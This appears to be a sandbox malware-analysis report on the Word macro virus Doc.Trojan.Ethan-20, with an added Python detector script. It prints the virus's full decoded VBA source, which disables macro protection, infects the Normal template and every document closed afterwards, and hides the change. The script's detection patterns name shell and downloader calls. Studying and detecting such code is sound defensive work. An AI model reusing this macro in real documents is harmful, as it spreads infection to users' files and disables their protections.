Verdict: MALICIOUS (Risk Score 80)

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Ethan-20. It contains a VBA macro whose Document_Close handler runs every time the infected document is closed. Under On Error Resume Next, the handler first switches off Word's macro virus protection, the save-Normal prompt, conversion confirmations and the Ctrl+Break cancel key, then copies its own code module line by line into 'Normal.dat' (and line 2, the 'Version = 0.24' marker, into 'License.dat') under the NormalTemplate path. If the Normal template's first module does not already begin with 'Private Sub Document_Close()', the code from Normal.dat is inserted into that module; otherwise it is inserted into the active document's module, which is then saved under its own name. Both .dat files are deleted afterwards and the document's Saved flag is restored so the modification is not noticed. This is classic Word macro-virus self-replication: persistence through the Normal template and re-infection of every document closed from then on. The only payloads are a 30% chance, after a fresh infection, of a "You are lamer?" message box, a 5% chance of inserting the contents of License.dat into the document body, and a Russian-language message box ("And what do you need this empty file for ???") from the Document_New handler. Nothing in the code downloads or executes anything external, so the behaviour is that of a self-replicating macro virus rather than a downloader.
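The behaviour summarised above can be turned into a repeatable triage check. The following Python script is an added example written for this page, not part of the analyzer's rule set or of oletools: it scans decoded VBA source for the indicator families that characterise this sample (an auto-executing event handler, self-modification through the VBProject object model, writes under the Normal template path, disabled virus protection) and separately for the network or shell calls a genuine downloader would need, then reproduces the sample's own "already infected" marker test so an extracted Normal template module can be checked. The indicator patterns, the verdict thresholds and the function names (scan_vba, classify, carries_ethan_marker) are this example's assumptions; SAMPLE is a shortened excerpt of the macros.bas listing in this report and BENIGN is a constructed comparison macro.

```python
import re

# Indicator families and their patterns are this example's own choices; they
# are not the analyzer's rule set.  Each family is a regex run over decoded
# VBA source text.
INDICATORS = {
    # event handlers that fire without the user invoking a macro
    "autoexec": re.compile(
        r"\bSub\s+(Document_(Open|Close|New)|Auto(Open|Close|Exec|New)|Workbook_Open)\b", re.I),
    # reads or rewrites VBA modules through the VBProject object model
    "self_modify": re.compile(
        r"\bVBProject\.VBComponents\b[^\n]*\bCodeModule\b|"
        r"\bCodeModule\.(InsertLines|AddFromString|AddFromFile|Lines|DeleteLines)\b", re.I),
    # touches the global Normal template (persistence across documents)
    "normal_template": re.compile(r"\bNormalTemplate\.(Path|VBProject)\b", re.I),
    # writes files with the legacy Open ... For Output/Append/Binary statement
    "file_write": re.compile(r"\bOpen\b[^\n]*\bFor\s+(Output|Append|Binary)\b", re.I),
    # turns off Word safety prompts, macro virus protection or Ctrl+Break
    "security_downgrade": re.compile(
        r"\.(VirusProtection|SaveNormalPrompt|ConfirmConversions)\s*=\s*(0|False)\b"
        r"|\bEnableCancelKey\s*=", re.I),
    "error_suppression": re.compile(r"\bOn\s+Error\s+Resume\s+Next\b", re.I),
    # saves the host document after modifying it
    "self_save": re.compile(r"\bActiveDocument\.(SaveAs|Save)\b", re.I),
    # what a downloader/dropper would need; this sample has none of it
    "downloader": re.compile(
        r"URLDownloadToFile|XMLHTTP|WinHttp|InternetOpen|\bShell\b|WScript\.Shell|"
        r"CreateObject|PowerShell|\bcmd(\.exe)?\b", re.I),
}


def scan_vba(src: str) -> dict:
    """Return, per indicator family, the distinct matching source fragments."""
    return {name: sorted({m.group(0) for m in rx.finditer(src)})
            for name, rx in INDICATORS.items()}


def classify(src: str) -> dict:
    """Combine indicator families into a verdict (thresholds are this example's)."""
    hits = scan_vba(src)

    def has(family):
        return bool(hits[family])

    if has("autoexec") and has("self_modify") and (has("normal_template") or has("self_save")):
        verdict = "macro-virus: self-replicates through the VBProject object model"
    elif has("autoexec") and has("downloader"):
        verdict = "downloader/dropper: auto-executing macro with network or shell access"
    elif has("autoexec"):
        verdict = "auto-executing macro: manual review needed"
    else:
        verdict = "no automatic execution trigger found"
    return {"verdict": verdict, "hits": hits}


def carries_ethan_marker(src: str) -> bool:
    """Mirror the sample's own 'already infected' test: the first real code line
    of the module is the Document_Close handler and the second starts with
    'Version'.  olevba prefixes its output with 'Attribute' lines, which
    CodeModule.Lines() never sees, so they are skipped here."""
    lines = [ln for ln in src.splitlines() if not ln.startswith("Attribute ")]
    return (len(lines) >= 2
            and lines[0].strip() == "Private Sub Document_Close()"
            and lines[1].strip().startswith("Version"))


# Constructed input: a shortened excerpt of the macros.bas listing in this report.
SAMPLE = r'''Attribute VB_Name = "ThisDocument"
Private Sub Document_Close()
Version = 0.24
On Error Resume Next
s = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Open NormalTemplate.Path & "\Normal.dat" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
t.CodeModule.InsertLines i, a
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Kill NormalTemplate.Path & "\Normal.dat"
End Sub
'''

# Constructed input: a harmless auto-open macro for comparison.
BENIGN = 'Private Sub Document_Open()\nMsgBox "Hello"\nEnd Sub\n'

if __name__ == "__main__":
    import json
    print(json.dumps(classify(SAMPLE), indent=2))
    print("Ethan marker present:", carries_ethan_marker(SAMPLE))
```

To run this against a real document, obtain the decoded source with oletools (`olevba --decode file.doc`, or `VBA_Parser(path).extract_macros()`, whose tuples carry the module source as their fourth element) and pass that text to classify(). An empty "downloader" family next to a populated "self_modify" and "normal_template" family is exactly the evidence for calling this sample a macro virus rather than a downloader.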
Heuristics (2)
- ClamAV: Doc.Trojan.Ethan-20 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Ethan-20
- VBA macros detected [medium, OLE_VBA_MACROS]: Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8149 bytes | f718e6aad69573767a2a1691cafcaff79db46dad2a370aaff107cd281150c281 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Version = 0.24
' Почему ты не сказал Бе-Бе ???   (English: "Why didn't you say Beh-Beh ???")
On Error Resume Next
s = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Randomize
Open NormalTemplate.Path & "\Normal.dat" For Output As #1
Open NormalTemplate.Path & "\License.dat" For Output As #2
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
If i = 2 Then Print #2, a
Next i
Close #1
Close #2
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 7) <> "Version" Then
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
End If
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
Set t = ActiveDocument.VBProject.VBComponents.Item(1)
Else
t = ""
End If
If t <> "" Then
Open NormalTemplate.Path & "\Normal.dat" For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q: Close #1
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Rnd < 0.3 Then
a = MsgBox("You are lamer? Press OK to confirm", vbOKOnly, "Windows NT")
End If
End If
Kill NormalTemplate.Path & "\Normal.dat"
If Rnd < 0.05 Then
ActiveDocument.Content.InsertFile NormalTemplate.Path & "\License.dat"
ActiveDocument.Save
End If
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
Kill NormalTemplate.Path & "\License.dat"
End Sub
Private Sub Document_New()
a = MsgBox("И зачем тебе этот пустой файл ???", vbQuestion, "WindowsNT") ' English: "And what do you need this empty file for ???"
End Sub
' Processing file: /opt/analyzer/scan_staging/f6cdce099e65404a888503a231d78320.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4049 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' LitR8 0x1EB8 0xEB85 0xB851 0x3FCE
' St Version
' Line #2:
' QuoteRem 0x0000 0x001E " Почему ты не сказал Бе-Бе ???"
' Line #3:
' OnError (Resume Next)
' Line #4:
' Ld ActiveDocument
' MemLd Saved
' St s
' Line #5:
' LitDI2 0x0001
' UMi
' Not
' Ld Application
' MemSt EnableCancelKey
' Line #6:
' StartWithExpr
' Ld Options
' With
' BoS 0x0000
' LitDI2 0x0000
' MemStWith ConfirmConversions
' BoS 0x0000
' LitDI2 0x0000
' MemStWith VirusProtection
' BoS 0x0000
' LitDI2 0x0000
' MemStWith SaveNormalPrompt
' BoS 0x0000
' EndWith
' Line #7:
' ArgsCall Read 0x0000
' Line #8:
' Ld NormalTemplate
' MemLd Path
' LitStr 0x000B "\Normal.dat"
' Concat
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #9:
' Ld NormalTemplate
' MemLd Path
' LitStr 0x000C "\License.dat"
' Concat
' LitDI2 0x0002
' Sharp
' LitDefault
' Open (For Output)
' Line #10:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0001
' Ld MacroContainer
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #11:
' Ld i
' LitDI2 0x0001
' LitDI2 0x0001
' Ld MacroContainer
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
... (truncated)